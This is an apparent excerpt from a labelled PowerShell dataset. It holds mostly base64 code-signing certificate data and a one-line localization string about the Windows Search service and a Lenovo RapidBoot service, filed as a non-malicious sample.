SW5jLjFBMD8GA1UEAxM4RGlnaUNlcnQgVHJ1c3RlZCBHNCBDb2RlIFNpZ25pbmcg # UlNBNDA5NiBTSEEzODQgMjAyMSBDQTEwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAw # ggIKAoICAQDVtC9C0CiteLdd1TlZG7GIQvUzjOs9gZdwxbvEhSYwn6SOaNhc9es0 # JAfhS0/TeEP0F9ce2vnS1WcaUk8OoVf8iJnBkcyBAz5NcCRks43iCH00fUyAVxJr # Q5qZ8sU7H/Lvy0daE6ZMswEgJfMQ04uy+wjwiuCdCcBlp/qYgEk1hz1RGeiQIXhF # LqGfLOEYwhrMxe6TSXBCMo/7xuoc82VokaJNTIIRSFJo3hC9FFdd6BgTZcV/sk+F # LEikVoQ11vkunKoAFdE3/hoGlMJ8yOobMubKwvSnowMOdKWvObarYBLj6Na59zHh # 3K3kGKDYwSNHR7OhD26jq22YBoMbt2pnLdK9RBqSEIGPsDsJ18ebMlrC/2pgVItJ # wZPt4bRc4G/rJvmM1bL5OBDm6s6R9b7T+2+TYTRcvJNFKIM2KmYoX7BzzosmJQay # g9Rc9hUZTO1i4F4z8ujo7AqnsAMrkbI2eb73rQgedaZlzLvjSFDzd5Ea/ttQokbI # YViY9XwCFjyDKK05huzUtw1T0PhH5nUwjewwk3YUpltLXXRhTT8SkXbev1jLchAp # QfDVxW0mdmgRQRNYmtwmKwH0iU1Z23jPgUo+QEdfyYFQc4UQIyFZYIpkVMHMIRro # OBl8ZhzNeDhFMJlP/2NPTLuqDQhTQXxYPUez+rbsjDIJAsxsPAxWEQIDAQABo4IB # WTCCAVUwEgYDVR0TAQH/BAgwBgEB/wIBADAdBgNVHQ4EFgQUaDfg67Y7+F8Rhvv+ # YXsIiGX0TkIwHwYDVR0jBBgwFoAU7NfjgtJxXWRM3y5nP+e6mK4cD08wDgYDVR0P # AQH/BAQDAgGGMBMGA1UdJQQMMAoGCCsGAQUFBwMDMHcGCCsGAQUFBwEBBGswaTAk # BggrBgEFBQcwAYYYaHR0cDovL29jc3AuZGlnaWNlcnQuY29tMEEGCCsGAQUFBzAC # hjVodHRwOi8vY2FjZXJ0cy5kaWdpY2VydC5jb20vRGlnaUNlcnRUcnVzdGVkUm9v # dEc0LmNydDBDBgNVHR8EPDA6MDigNqA0hjJodHRwOi8vY3JsMy5kaWdpY2VydC5j # b20vRGlnaUNlcnRUcnVzdGVkUm9vdEc0LmNybDAcBgNVHSAEFTATMAcGBWeBDAED # MAgGBmeBDAEEATANBgkqhkiG9w0BAQwFAAOCAgEAOiNEPY0Idu6PvDqZ01bgAhql # +Eg08yy25nRm95RysQDKr2wwJxMSnpBEn0v9nqN8JtU3vDpdSG2V1T9J9Ce7FoFF # UP2cvbaF4HZ+N3HLIvdaqpDP9ZNq4+sg0dVQeYiaiorBtr2hSBh+3NiAGhEZGM1h # mYFW9snjdufE5BtfQ/g+lP92OT2e1JnPSt0o618moZVYSNUa/tcnP/2Q0XaG3Ryw # YFzzDaju4ImhvTnhOE7abrs2nfvlIVNaw8rpavGiPttDuDPITzgUkpn13c5Ubdld # AhQfQDN8A+KVssIhdXNSy0bYxDQcoqVLjc1vdjcshT8azibpGL6QB7BDf5WIIIJw # 8MzK7/0pNVwfiThV9zeKiwmhywvpMRr/LhlcOXHhvpynCgbWJme3kuZOX956rEnP # LqR0kq3bPKSchh/jwVYbKyP/j7XqiHtwa+aguv06P0WmxOgWkVKLQcBIhEuWTatE # QOON8BUozu3xGFYHKi8QxAwIZDwzj64ojDzLj4gLDb879M4ee47vtevLt/B3E+bn # KD+sEq6lLyJsQfmCXBVmzGwOysWGw/YmMwwHS6DTBwJqakAwSEs0qFEgu60bhQji # WQ1tygVQK+pKHJ6l/aCnHwZ05/LWUpD9r4VIIflXO7ScA+2GRfS0YW6/aOImYIbq # yK+p/pQd52MbOoZWeE4wggbWMIIEvqADAgECAhAILYwW0nV0JkMDtityXUvoMA0G # CSqGSIb3DQEBCwUAMGkxCzAJBgNVBAYTAlVTMRcwFQYDVQQKEw5EaWdpQ2VydCwg # SW5jLjFBMD8GA1UEAxM4RGlnaUNlcnQgVHJ1c3RlZCBHNCBDb2RlIFNpZ25pbmcg # UlNBNDA5NiBTSEEzODQgMjAyMSBDQTEwHhcNMjQwMjEyMDAwMDAwWhcNMjcwMjEx # MjM1OTU5WjBeMQswCQYDVQQGEwJTRTENMAsGA1UEBxMETHVuZDEfMB0GA1UEChMW # QXhpcyBDb21tdW5pY2F0aW9ucyBBQjEfMB0GA1UEAxMWQXhpcyBDb21tdW5pY2F0 # aW9ucyBBQjCCAaIwDQYJKoZIhvcNAQEBBQADggGPADCCAYoCggGBAOk0Sr22C6QH # zDpps6p3+m4c4HrGKW9dju1+awvCWpNnrTrCxxcqC7Fexgt3VVR2GfI+hEHrkSV9 # hq7tCT20No1s4OqGdB/FasUvqq8jCuoXKQQnd5gqFhFz/aL+1ocr2NvtCsxuNihB # UA3isiFf0R0uXcEIoi+tUiy0vJf5ZstopMEuSSOZlANhdWvwBTd8DL1EBYDp4Z/t # 1kWLax6NI8fim1MJxi5OaVUd1haFQMbzeBiwDXlMVJCyYcSVH7fuKCRhoem4pX1g # fdbM3yfhigegJPRui13ai6I69X71GoyRCBnkCgkrw8nUrOHGjrTe90sXLvVSU0Yu # j3VZzcDkdxN16tHG2SK3NT/7d5EmgrUSwabvS36sTRy0VeSCmop4ByDlTUCljGiP # cDO5viiyDF9SRbKa0BSuVAB9xtaaqjw9+sWRxiUqHVq8cRPOylBcziOMVFSE4ENc # aH3A55N2kb2tBalRm0GPfvB1wRzHdow/ArdGYB1FYIrBi2IUcUsgKwIDAQABo4IC # AzCCAf8wHwYDVR0jBBgwFoAUaDfg67Y7+F8Rhvv+YXsIiGX0TkIwHQYDVR0OBBYE # FCCITo81URSaUaiF+AwqLquw/5UcMD4GA1UdIAQ3MDUwMwYGZ4EMAQQBMCkwJwYI # KwYBBQUHAgEWG2h0dHA6Ly93d3cuZGlnaWNlcnQuY29tL0NQUzAOBgNVHQ8BAf8E # BAMCB4AwEwYDVR0lBAwwCgYIKwYBBQUHAwMwgbUGA1UdHwSBrTCBqjBToFGgT4ZN # aHR0cDovL2NybDMuZGlnaWNlcnQuY29tL0RpZ2lDZXJ0VHJ1c3RlZEc0Q29kZVNp # Z25pbmdSU0E0MDk2U0hBMzg0MjAyMUNBMS5jcmwwU6BRoE+GTWh0dHA6Ly9jcmw0 # LmRpZ2ljZXJ0LmNvbS9EaWdpQ2VydFRydXN0ZWRHNENvZGVTaWduaW5nUlNBNDA5 # NlNIQTM4NDIwMjFDQTEuY3JsMIGUBggrBgEFBQcBAQSBhzCBhDAkBggrBgEFBQcw # AYYYaHR0cDovL29jc3AuZGlnaWNlcnQuY29tMFwGCCsGAQUFBzAChlBodHRwOi8v # Y2FjZXJ0cy5kaWdpY2VydC5jb20vRGlnaUNlcnRUcnVzdGVkRzRDb2RlU2lnbmlu # Z1JTQTQwOTZTSEEzODQyMDIxQ0ExLmNydDAJBgNVHRMEAjAAMA0GCSqGSIb3DQEB # CwUAA4ICAQBTl/rp/1EMC6RXuNwZmY8QNQpzSOODOmLbFU1hMlHq/iipWO+tsAnH # fB4CnZlrbgkVa64syckD29gWMrYp2PMdTwsL/vHmUI0lZj1pJ3zCvB5E+4CnKkhY # SIre1yukMyzbHR5y5X2bQ6kVtR0mkKqDTrT+vm6abBMmNcVwc+j5IJ9viHspncAs # X/t7gnYDmMnHCWTQwR01wNYypEbmpf5ZtF8233I5toy+x2TGBx7PToduYzxWiF9G # Hd18UNGuyNjsLPnHI0cY3vGNMo5GiaisR9e/CHYUq149MduRRifz9kkq8JA81k0j # +DEsZb8lOORoA7gte007xnesv35OL4ezbfhjkKYICGjRVSB/Xu8YhH04Xs6AbFWB # Boqi9/DH9RV3S0LH+JzxNIeDUw8LW7VNYrSOHWuRqPSazmtWll+MQUDV0p4LIUMl # EjoUNsRBvsDYSMiZSTNizMgyp437XDv25+iO8GMtiKlymsOPuKYALFVn0TJxdIet # ID0HnXa560C3FysEDxsGbVCI6L1l9j5RCmmF1qUs7o2oczvlDyplesA0sNOSlpJF # xyTgvlXXloxJCH7Yaz/2ItvhfMt1CZhMtyp38Y1yWlgMqSTrlJVxAcXHOXzu/mEM # aNvDTqF/zGnW5todKFHL092hQqm+8xGNOjL0C8G+ByZ2tzSh3y1R7jGCGekwghnl # AgEBMH0waTELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDkRpZ2lDZXJ0LCBJbmMuMUEw # PwYDVQQDEzhEaWdpQ2VydCBUcnVzdGVkIEc0IENvZGUgU2lnbmluZyBSU0E0MDk2 # IFNIQTM4NCAyMDIxIENBMQIQCC2MFtJ1dCZDA7Yrcl1L6DANBglghkgBZQMEAgEF # AKB8MBAGCisGAQQBgjcCAQwxAjAAMBkGCSqGSIb3DQEJAzEMBgorBgEEAYI3AgEE # MBwGCisGAQQBgjcCAQsxDjAMBgorBgEEAYI3AgEVMC8GCSqGSIb3DQEJBDEiBCC8 # zpn/ICHg5yqsnPKbuMkmlTNOcU8e8bXR5Jl73q3ZXTANBgkqhkiG9w0BAQEFAASC # AYAl2sJKrfvadGgAzljkTovOfJWLOPdSB0UdoPUMtGpWXjFP9wX+4a+COI6SB2WV # NPipxUd/yI71SwJ3q3R4rcC/GUbpqKmwSy45R2vsvNrSkYNL7MYTbwaTKj+6hu7m # vahxwlAX4Mo+8AqOQdSmtcCfdRM8SYGPcOuEQXeJJNRmXSaB/MYw3XrbchR2XsUd # rxZPQH95UMMbePUbVjIw++qMRKDdS1LDfcJ7pZ14xSehtolNgvvFWwsZJTMbrNvI # WB5qb5ieuHksn73rWTiiCZbRvVJmXMsypxaTadR2EV8MTsm5+NBHm2uPaF3n+EMw # PbYGhTx6xKfzSW9kvvkFSCVmum0fxDDWoylpDBrSO7J/dRX/wKc9mBnAE+h/tly/ # GQBNSKBantVMW8TsiUfrhbpbrkyH6D1LkcFigGhlXMt8HuByYAlM2xlWfBk69iTm # JHe+qJpmse4TYspHhAveTFRCe0gv35PNzbRTWRt5skuTRPkkNDLmgvK4j1sXkuwv # L8ehghc/MIIXOwYKKwYBBAGCNwMDATGCFyswghcnBgkqhkiG9w0BBwKgghcYMIIX # FAIBAzEPMA0GCWCGSAFlAwQCAQUAMHcGCyqGSIb3DQEJEAEEoGgEZjBkAgEBBglg # hkgBhv1sBwEwMTANBglghkgBZQMEAgEFAAQgN4QSSsXv021u0ZUzk3DINC7AY59k # wUo0OeF/62eq0GECEEeZ/t0ljquiXcuI5ojj/j4YDzIwMjQwOTIwMDk1NjM4WqCC # EwkwggbCMIIEqqADAgECAhAFRK/zlJ0IOaa/2z9f5WEWMA0GCSqGSIb3DQEBCwUA # MGMxCzAJBgNVBAYTAlVTMRcwFQYDVQQKEw5EaWdpQ2VydCwgSW5jLjE7MDkGA1UE # AxMyRGlnaUNlcnQgVHJ1c3RlZCBHNCBSU0E0MDk2IFNIQTI1NiBUaW1lU3RhbXBp # bmcgQ0EwHhcNMjMwNzE0MDAwMDAwWhcNMzQxMDEzMjM1OTU5WjBIMQswCQYDVQQG # EwJVUzEXMBUGA1UEChMORGlnaUNlcnQsIEluYy4xIDAeBgNVBAMTF0RpZ2lDZXJ0 # IFRpbWVzdGFtcCAyMDIzMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA # o1NFhx2DjlusPlSzI+DPn9fl0uddoQ4J3C9Io5d6OyqcZ9xiFVjBqZMRp82qsmrd # ECmKHmJjadNYnDVxvzqX65RQjxwg6seaOy+WZuNp52n+W8PWKyAcwZeUtKVQgfLP # ywemMGjKg0La/H8JJJSkghraarrYO8pd3hkYhftF6g1hbJ3+cV7EBpo88MUueQ8b # ZlLjyNY+X9pD04T10Mf2SC1eRXWWdf7dEKEbg8G45lKVtUfXeCk5a+B4WZfjRCtK # 1ZXO7wgX6oJkTf8j48qG7rSkIWRw69XloNpjsy7pBe6q9iT1HbybHLK3X9/w7nZ9 # MZllR1WdSiQvrCuXvp/k/XtzPjLuUjT71Lvr1KAsNJvj3m5kGQc3AZEPHLVRzapM # ZoOIaGK7vEEbeBlt5NkP4FhB+9ixLOFRr7StFQYU6mIIE9NpHnxkTZ0P387RXoyq # q1AVybPKvNfEO2hEo6U7Qv1zfe7dCv95NBB+plwKWEwAPoVpdceDZNZ1zY8Sdlal # JPrXxGshuugfNJgvOuprAbD3+yqG7HtSOKmYCaFxsmxxrz64b5bV4RAT/mFHCoz+ # 8LbH1cfebCTwv0KCyqBxPZySkwS0aXAnDU+3tTbRyV8IpHCj7ArxES5k4MsiK8rx # KBMhSVF+BmbTO77665E42FEHypS34lCh8zrTioPLQHsCAwEAAaOCAYswggGHMA4G # A1UdDwEB/wQEAwIHgDAMBgNVHRMBAf8EAjAAMBYGA1UdJQEB/wQMMAoGCCsGAQUF # BwMIMCAGA1UdIAQZMBcwCAYGZ4EMAQQCMAsGCWCGSAGG/WwHATAfBgNVHSMEGDAW # gBS6FtltTYUvcyl2mi91jGogj57IbzAdBgNVHQ4EFgQUpbbvE+fvzdBkodVWqWUx # o97V40kwWgYDVR0fBFMwUTBPoE2gS4ZJaHR0cDovL2NybDMuZGlnaWNlcnQuY29t # L0RpZ2lDZXJ0VHJ1c3RlZEc0UlNBNDA5NlNIQTI1NlRpbWVTdGFtcGluZ0NBLmNy # bDCBkAYIKwYBBQUHAQEEgYMwgYAwJAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmRp # Z2ljZXJ0LmNvbTBYBggrBgEFBQcwAoZMaHR0cDovL2NhY2VydHMuZGlnaWNlcnQu # Y29tL0RpZ2lDZXJ0VHJ1c3RlZEc0UlNBNDA5NlNIQTI1NlRpbWVTdGFtcGluZ0NB # LmNydDANBgkqhkiG9w0BAQsFAAOCAgEAgRrW3qCptZgXvHCNT4o8aJzYJf/LLOTN # 6l0ikuyMIgKpuM+AqNnn48XtJoKKcS8Y3U623mzX4WCcK+3tPUiOuGu6fF29wmE3 # aEl3o+uQqhLXJ4Xzjh6S2sJAOJ9dyKAuJXglnSoFeoQpmLZXeY/bJlYrsPOnvTcM # 2Jh2T1a5UsK2nTipgedtQVyMadG5K8TGe8+c+njikxp2oml101DkRBK+IA2eqUTQ # +OVJdwhaIcW0z5iVGlS6ubzBaRm6zxbygzc0brBBJt3eWpdPM43UjXd9dUWhpVgm # agNF3tlQtVCMr1a9TMXhRsUo063nQwBw3syYnhmJA+rUkTfvTVLzyWAhxFZH7doR # S4wyw4jmWOK22z75X7BC1o/jF5HRqsBV44a/rCcsQdCaM0qoNtS5cpZ+l3k4SF/K # wtw9Mt911jZnWon49qfH5U81PAC9vpwqbHkB3NpE5jreODsHXjlY9HxzMVWggBHL # FAx+rrz+pOt5Zapo1iLKO+uagjVXKBbLafIymrLS2Dq4sUaGa7oX/cR3bBVsrquv # czroSUa31X/MtjjA2Owc9bahuEMs305MfR5ocMB3CtQC4Fxguyj/OOVSWtasFyIj # TvTs0xf7UGv/B3cfcZdEQcm4RtNsMnxYL2dHZeUbc7aZ+WssBkbvQR7w8F/g29mt # kIBEr4AQQYowggauMIIElqADAgECAhAHNje3JFR82Ees/ShmKl5bMA0GCSqGSIb3 # DQEBCwUAMGIxCzAJBgNVBAYTAlVTMRUwEwYDVQQKEwxEaWdpQ2VydCBJbmMxGTAX # BgNVBAsTEHd3dy5kaWdpY2VydC5jb20xITAfBgNVBAMTGERpZ2lDZXJ0IFRydXN0 # ZWQgUm9vdCBHNDAeFw0yMjAzMjMwMDAwMDBaFw0zNzAzMjIyMzU5NTlaMGMxCzAJ # BgNVBAYTAlVTMRcwFQYDVQQKEw5EaWdpQ2VydCwgSW5jLjE7MDkGA1UEAxMyRGln # aUNlcnQgVHJ1c3RlZCBHNCBSU0E0MDk2IFNIQTI1NiBUaW1lU3RhbXBpbmcgQ0Ew # ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDGhjUGSbPBPXJJUVXHJQPE # 8pE3qZdRodbSg9GeTKJtoLDMg/la9hGhRBVCX6SI82j6ffOciQt/nR+eDzMfUBML # JnOWbfhXqAJ9/UO0hNoR8XOxs+4rgISKIhjf69o9xBd/qxkrPkLcZ47qUT3w1lbU # 5ygt69OxtXXnHwZljZQp09nsad/ZkIdGAHvbREGJ3HxqV3rwN3mfXazL6IRktFLy # dkf3YYMZ3V+0VAshaG43IbtArF+y3kp9zvU5EmfvDqVjbOSmxR3NNg1c1eYbqMFk # dECnwHLFuk4fsbVYTXn+149zk6wsOeKlSNbwsDETqVcplicu9Yemj052FVUmcJgm # f6AaRyBD40NjgHt1biclkJg6OBGz9vae5jtb7IHeIhTZgirHkr+g3uM+onP65x9a # bJTyUpURK1h0QCirc0PO30qhHGs4xSnzyqqWc0Jon7ZGs506o9UD4L/wojzKQtwY # SH8UNM/STKvvmz3+DrhkKvp1KCRB7UK/BZxmSVJQ9FHzNklNiyDSLFc1eSuo80Vg # vCONWPfcYd6T/jnA+bIwpUzX6ZhKWD7TA4j+s4/TXkt2ElGTyYwMO1uKIqjBJgj5 # FBASA31fI7tk42PgpuE+9sJ0sj8eCXbsq11GdeJgo1gJASgADoRU7s7pXcheMBK9 # Rp6103a50g5rmQzSM7TNsQIDAQABo4IBXTCCAVkwEgYDVR0TAQH/BAgwBgEB/wIB # ADAdBgNVHQ4EFgQUuhbZbU2FL3MpdpovdYxqII+eyG8wHwYDVR0jBBgwFoAU7Nfj # gtJxXWRM3y5nP+e6mK4cD08wDgYDVR0PAQH/BAQDAgGGMBMGA1UdJQQMMAoGCCsG # AQUFBwMIMHcGCCsGAQUFBwEBBGswaTAkBggrBgEFBQcwAYYYaHR0cDovL29jc3Au # ZGlnaWNlcnQuY29tMEEGCCsGAQUFBzAChjVodHRwOi8vY2FjZXJ0cy5kaWdpY2Vy # dC5jb20vRGlnaUNlcnRUcnVzdGVkUm9vdEc0LmNydDBDBgNVHR8EPDA6MDigNqA0 # hjJodHRwOi8vY3JsMy5kaWdpY2VydC5jb20vRGlnaUNlcnRUcnVzdGVkUm9vdEc0 # LmNybDAgBgNVHSAEGTAXMAgGBmeBDAEEAjALBglghkgBhv1sBwEwDQYJKoZIhvcN # AQELBQADggIBAH1ZjsCTtm+YqUQiAX5m1tghQuGwGC4QTRPPMFPOvxj7x1Bd4ksp # +3CKDaopafxpwc8dB+k+YMjYC+VcW9dth/qEICU0MWfNthKWb8RQTGIdDAiCqBa9 # qVbPFXONASIlzpVpP0d3+3J0FNf/q0+KLHqrhc1DX+1gtqpPkWaeLJ7giqzl/Yy8 # ZCaHbJK9nXzQcAp876i8dU+6WvepELJd6f8oVInw1YpxdmXazPByoyP6wCeCRK6Z # JxurJB4mwbfeKuv2nrF5mYGjVoarCkXJ38SNoOeY+/umnXKvxMfBwWpx2cYTgAnE # tp/Nh4cku0+jSbl3ZpHxcpzpSwJSpzd+k1OsOx0ISQ+UzTl63f8lY5knLD0/a6fx # ZsNBzU+2QJshIUDQtxMkzdwdeDrknq3lNHGS1yZr5Dhzq6YBT70/O3itTK37xJV7 # 7QpfMzmHQXh6OOmc4d0j/R0o08f56PGYX/sr2H7yRp11LB4nLCbbbxV7HhmLNriT # 1ObyF5lZynDwN7+YAN8gFk8n+2BnFqFmut1VwDophrCYoCvtlUG3OtUVmDG0YgkP # Cr2B2RP+v6TR81fZvAT6gt4y3wSJ8ADNXcL50CN/AAvkdgIm2fBldkKmKYcJRyvm # fxqkhQ/8mJb2VVQrH4D6wPIOK+XW+6kvRBVK5xMOHds3OBqhK/bt1nz8MIIFjTCC # BHWgAwIBAgIQDpsYjvnQLefv21DiCEAYWjANBgkqhkiG9w0BAQwFADBlMQswCQYD # VQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGln # aWNlcnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJvb3QgQ0Ew # HhcNMjIwODAxMDAwMDAwWhcNMzExMTA5MjM1OTU5WjBiMQswCQYDVQQGEwJVUzEV # MBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNlcnQuY29t # MSEwHwYDVQQDExhEaWdpQ2VydCBUcnVzdGVkIFJvb3QgRzQwggIiMA0GCSqGSIb3 # DQEBAQUAA4ICDwAwggIKAoICAQC/5pBzaN675F1KPDAiMGkz7MKnJS7JIT3yithZ # wuEppz1Yq3aaza57G4QNxDAf8xukOBbrVsaXbR2rsnnyyhHS5F/WBTxSD1Ifxp4V # pX6+n6lXFllVcq9ok3DCsrp1mWpzMpTREEQQLt+C8weE5nQ7bXHiLQwb7iDVySAd # YyktzuxeTsiT+CFhmzTrBcZe7FsavOvJz82sNEBfsXpm7nfISKhmV1efVFiODCu3 # T6cw2Vbuyntd463JT17lNecxy9qTXtyOj4DatpGYQJB5w3jHtrHEtWoYOAMQjdjU # N6QuBX2I9YI+EJFwq1WCQTLX2wRzKm6RAXwhTNS8rhsDdV14Ztk6MUSaM0C/CNda # SaTC5qmgZ92kJ7yhTzm1EVgX9yRcRo9k98FpiHaYdj1ZXUJ2h4mXaXpI8OCiEhtm # mnTK3kse5w5jrubU75KSOp493ADkRSWJtppEGSt+wJS00mFt6zPZxd9LBADMfRyV # w4/3IbKyEbe7f/LVjHAsQWCqsWMYRJUadmJ+9oCw++hkpjPRiQfhvbfmQ6QYuKZ3 # AeEPlAwhHbJUKSWJbOUOUlFHdL4mrLZBdd56rF+NP8m800ERElvlEFDrMcXKchYi # Cd98THU/Y+whX8QgUWtvsauGi0/C1kVfnSD8oR7FwI+isX4KJpn15GkvmB0t9dmp # sh3lGwIDAQABo4IBOjCCATYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQU7Nfj # gtJxXWRM3y5nP+e6mK4cD08wHwYDVR0jBBgwFoAUReuir/SSy4IxLVGLp6chnfNt # yA8wDgYDVR0PAQH/BAQDAgGGMHkGCCsGAQUFBwEBBG0wazAkBggrBgEFBQcwAYYY # aHR0cDovL29jc3AuZGlnaWNlcnQuY29tMEMGCCsGAQUFBzAChjdodHRwOi8vY2Fj # ZXJ0cy5kaWdpY2VydC5jb20vRGlnaUNlcnRBc3N1cmVkSURSb290Q0EuY3J0MEUG # A1UdHwQ+MDwwOqA4oDaGNGh0dHA6Ly9jcmwzLmRpZ2ljZXJ0LmNvbS9EaWdpQ2Vy # dEFzc3VyZWRJRFJvb3RDQS5jcmwwEQYDVR0gBAowCDAGBgRVHSAAMA0GCSqGSIb3 # DQEBDAUAA4IBAQBwoL9DXFXnOF+go3QbPbYW1/e/Vwe9mqyhhyzshV6pGrsi+Ica # aVQi7aSId229GhT0E0p6Ly23OO/0/4C5+KH38nLeJLxSA8hO0Cre+i1Wz/n096ww # epqLsl7Uz9FDRJtDIeuWcqFItJnLnU+nBgMTdydE1Od/6Fmo8L8vC6bp8jQ87PcD # x4eo0kxAGTVGamlUsLihVo7spNU96LHc/RzY9HdaXFSMb++hUD38dglohJ9vytsg # jTVgHAIDyyCwrFigDkBjxZgiwbJZ9VVrzyerbHbObyMt9H5xaiNrIv8SuFQtJ37Y # OtnwtoeW/VvRXKwYw02fc7cBqZ9Xql4o4rmUMYIDdjCCA3ICAQEwdzBjMQswCQYD # VQQGEwJVUzEXMBUGA1UEChMORGlnaUNlcnQsIEluYy4xOzA5BgNVBAMTMkRpZ2lD # ZXJ0IFRydXN0ZWQgRzQgUlNBNDA5NiBTSEEyNTYgVGltZVN0YW1waW5nIENBAhAF # RK/zlJ0IOaa/2z9f5WEWMA0GCWCGSAFlAwQCAQUAoIHRMBoGCSqGSIb3DQEJAzEN # BgsqhkiG9w0BCRABBDAcBgkqhkiG9w0BCQUxDxcNMjQwOTIwMDk1NjM4WjArBgsq # hkiG9w0BCRACDDEcMBowGDAWBBRm8CsywsLJD4JdzqqKycZPGZzPQDAvBgkqhkiG # 9w0BCQQxIgQgZt8I6422OjBF3Oe2n7X+oR0+4i5jijRhBm+me1yoSuUwNwYLKoZI # hvcNAQkQAi8xKDAmMCQwIgQg0vbkbe10IszR1EBXaEE2b4KK2lWarjMWr00amtQM # eCgwDQYJKoZIhvcNAQEBBQAEggIAFhZDw4qMwV2oSAC+kS+DXNhnMTiDoeQ+/x8C # v8f6BQ1HjWk/BAeeCDj/ZCgiC+3z+QgSdm2/Q0mp6M0beLdgplOzLFE3BrcWGHSs # iEiRkIeTgYZt1048D5Zp7mpGmPJJayi/fTtcuv+mhyJF+3Loug/GZgMGWQdFDTM1 # Zf/Rg8ZdxneqAWbh9P+7KcUi+QWxzQss5wWHeGsOb3r3ayCVlC6iRqE2pXAOyEkb # D60qnwQ7nOKjikfs6IrLTHFh6KWKpKzD6yvAKEekEiJRRZPpvIsndLZ2sjt//Fy8 # mo73CXdKs3jty6iJgnwRrStxItss+03xX4JApM04Nzv70CSqTW9b4dZQRB42kP4Y # 8Q0lliGGKzmDBr+neaDWEwYIBOYfP0i3hGaTvlqozLfNgKns7ZRmLXnWHgcdLKWo # QXiLf9Lvk1H51l95d9HL2pYS1BoDeKeGt67yajOdp1AwJqPbfs6QOxkSRYbhVHuF # zLGPnLdLwWgjL9npI92hNIQfP6luvfPC9We0XWl0DhnNzTGs5ketXF9/E4Nhj1Qf # xq+Uezd7JznsCH4k7IUemAnVtT0FBYs8DcbzCZwFlzC5WmBnud/LiV+WD/O8YGI4 # IDepEkd/SMDe8WcbmV1od+L564mKxbqYE7TxK+git8OfmaBcB7GO27xRcCsBl5Y8 # IdIE+bU= # SIG # End signature block
combined_dataset/train/non-malicious/sample_6_20.ps1
sample_6_20.ps1
ConvertFrom-StringData @' id_windowssearchlenovorapidbootcheck_st=The Windows Search service is stopped and the HyperW7Svc64.exe service was detected '@ # SIG # Begin signature block # MIIoKgYJKoZIhvcNAQcCoIIoGzCCKBcCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBoiJgSjlRBHEmH # 2vuWniD1mItVtr0ChyBmSrv+Z3+MyaCCDXYwggX0MIID3KADAgECAhMzAAAEBGx0 # Bv9XKydyAAAAAAQEMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTE0WhcNMjUwOTExMjAxMTE0WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQC0KDfaY50MDqsEGdlIzDHBd6CqIMRQWW9Af1LHDDTuFjfDsvna0nEuDSYJmNyz # NB10jpbg0lhvkT1AzfX2TLITSXwS8D+mBzGCWMM/wTpciWBV/pbjSazbzoKvRrNo # DV/u9omOM2Eawyo5JJJdNkM2d8qzkQ0bRuRd4HarmGunSouyb9NY7egWN5E5lUc3 # a2AROzAdHdYpObpCOdeAY2P5XqtJkk79aROpzw16wCjdSn8qMzCBzR7rvH2WVkvF # HLIxZQET1yhPb6lRmpgBQNnzidHV2Ocxjc8wNiIDzgbDkmlx54QPfw7RwQi8p1fy # 4byhBrTjv568x8NGv3gwb0RbAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU8huhNbETDU+ZWllL4DNMPCijEU4w # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMjkyMzAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAIjmD9IpQVvfB1QehvpC # Ge7QeTQkKQ7j3bmDMjwSqFL4ri6ae9IFTdpywn5smmtSIyKYDn3/nHtaEn0X1NBj # L5oP0BjAy1sqxD+uy35B+V8wv5GrxhMDJP8l2QjLtH/UglSTIhLqyt8bUAqVfyfp # h4COMRvwwjTvChtCnUXXACuCXYHWalOoc0OU2oGN+mPJIJJxaNQc1sjBsMbGIWv3 # cmgSHkCEmrMv7yaidpePt6V+yPMik+eXw3IfZ5eNOiNgL1rZzgSJfTnvUqiaEQ0X # dG1HbkDv9fv6CTq6m4Ty3IzLiwGSXYxRIXTxT4TYs5VxHy2uFjFXWVSL0J2ARTYL # E4Oyl1wXDF1PX4bxg1yDMfKPHcE1Ijic5lx1KdK1SkaEJdto4hd++05J9Bf9TAmi # 